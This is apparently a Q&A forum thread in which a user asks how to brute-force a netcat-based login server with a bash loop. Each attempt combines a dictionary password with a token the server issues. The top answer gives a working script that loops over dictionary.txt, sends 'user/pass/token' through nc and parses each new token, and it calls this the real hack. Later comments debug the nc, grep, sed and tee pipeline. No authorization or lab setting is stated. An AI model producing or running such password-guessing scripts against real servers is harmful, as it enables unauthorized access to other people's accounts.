# Linux Bash script brute force login server

Tags: bash, variables, pipeline, brute-force, autologin

I would like to use the passwords in a dictionary and try to login to the server. But, I need to combine the token received from server to my string for login.

Example:

```
nc server.com
```

I will receive:

```
Welcome. Your token is: 123456
```

After that, a server will be listening and I need to type string in the format:

```
user1/password/123456
```

So, how can I write the loop bash script to try all passwords in the dictionary. I suppose to use the script:

```
echo "user1/password/$token" > nc server.com | token = $(grep ....) (to get the token)
```

So how can I get back the token to echo?

Comment: What dictionary are you using? `/usr/share/dict/words`? Are you excluding possessive form of the words? (e.g. `Jack` and excluding `Jack's`)? Does the *'token'* change on each login attempt?

Comment: The 'token' is changed on each login attempt. And the password, I use my own dictionary. I can read the password before to the variable {$password}

Answer (score 1):

It's not entirely clear where all of your words are coming from, but suffice it to say the way you feed them into your brute-force attempt will be the same regardless.

The idea is to form your first attempt to the server, send your attempt and then obtain a *token*. You then enter the loop where the `pass` to try is read from the dictionary and combined with the `user` and `token` from the last attempt to try the server again. (you need some way to know if it successfully logs in. I presume you will get something other than a token in that case)

So during the first pass, it either succeeds or fails, and you get a new token from the last attempt. You simply loop at this point and repeat until you are either logged in or you reach the end of the dictionary (bummer).

I would envision something similar to the following for the tool. It can be done many ways, but if I were getting words from a dictionary and token back I had to use for the next attempt, I'd do something like the following:

```
#!/bin/bash

user=youruser       ## set user
pass=yourpass       ## set pass
token="$(nc server.com <<< "$user/$pass/123456")"  ## get str w/token
token=${token##* }  ## parse token with parameter expansion

while read -r pass; do      ## loop over all other passwords
    token="$(nc server.com <<< "$user/$pass/$token)"  ## try, get token
    token=${token##* }      ## parse new token
    ## check here if login succeeded (break), if not loop again...
done < "dictionary.txt"     ## loop over all passwords in dictionary
```

Look things over and let me know if you have any other questions.

Comment: Thank you very much! I will try it and tell you the results!

Comment: According to your code, we use the last token for the new login, right? It seems not right because in the new login, we have a new token!

Comment: Well this is unclear and why I asked if you received a new token every time you tried and you said yes. So each time you use the token you were given for your next login attempt. That is what I understood was needed. The very first token is just a guess (`123456`) right, you use the real token from that attempt to start the real hack.

Comment: I'm sorry because of this confusion. The token is provided when you connect to the server, then you will use this token for login. So, if login failed, the connection will be closed and the token will be destroyed. Next time, you need to connect to the server and use a new token for login.

Comment: Ok, that isn't much different, but does reverse the order of how the token will be used. So the login is a two-step process (1) you take some action to contact the server and it returns a token and then (2) in a second contact you submit the`"$user/$pass/123456"` string to complete the login? Where I'm confused is generally you provide the user name as (1) and then can provide (2). What is unclear here is what do you do for the first contact with the server to get the first token?

Answer (score 0):

Put the pipe chain inside:

```
token=$(echo "user1/password/$token" | nc server.com | grep ....)
```

Comment: Thank you! I have tried but I do not have any response from the server. Can you give me another way =D

Comment: How to use the variables in the pipeline?

Comment: @user145621 You made a typo (`>` → `|`)

Comment: Oh! I see, sorry but it still no response. Here is my command
`token=$(echo "user1/$password/$token" | nc server.com | grep 'Welcome. Your token is: ' | sed 's/Welcome. Your token is: //')`

Comment: @user145621 Try `echo`ing the output, pr pipe it through `tee` so you get a copy of the output on stderr.

Comment: You mean get the text from the server and `tee` to `stderr` and after that use text in stderr. Sorry, I'm a newbie in bash script!

Comment: @user145621 Nope. I mean `tee` to stderr and you'll be able to see the result!

Comment: If I use
`token=$(echo "user1/$paspassword/$token" | nc server.com | grep 'Welcome. Your token is: ' | sed 's/Welcome. Your token is: //') |  tee /dev/stderr` , I still do not see any response. If I use `token=$(echo "user1/$paspassword/$token" | nc server.com | grep 'Welcome. Your token is: ' | sed 's/Welcome. Your token is: //' |  tee /dev/stderr)`, I will see my token.

Comment: @user145621 Insert `tee` in the middle: `token=$(echo "user1/$paspassword/$token" | nc server.com | tee /dev/stderr | grep 'Welcome. Your token is: ' | sed 's/Welcome. Your token is: //')`

Comment: Thanks! I have tried server response _Invalid Token_

Comment: Maybe I need to `echo` after `grep` token!

Comment: @user145621 Yup.

Comment: Thanks! But still not working. Do we have another way, no need to use pipeline?

Comment: @user145621 I'm afraid force avoiding piping will make more mess. You can actually capture the output of each program with `$()` and send them with `<<<`.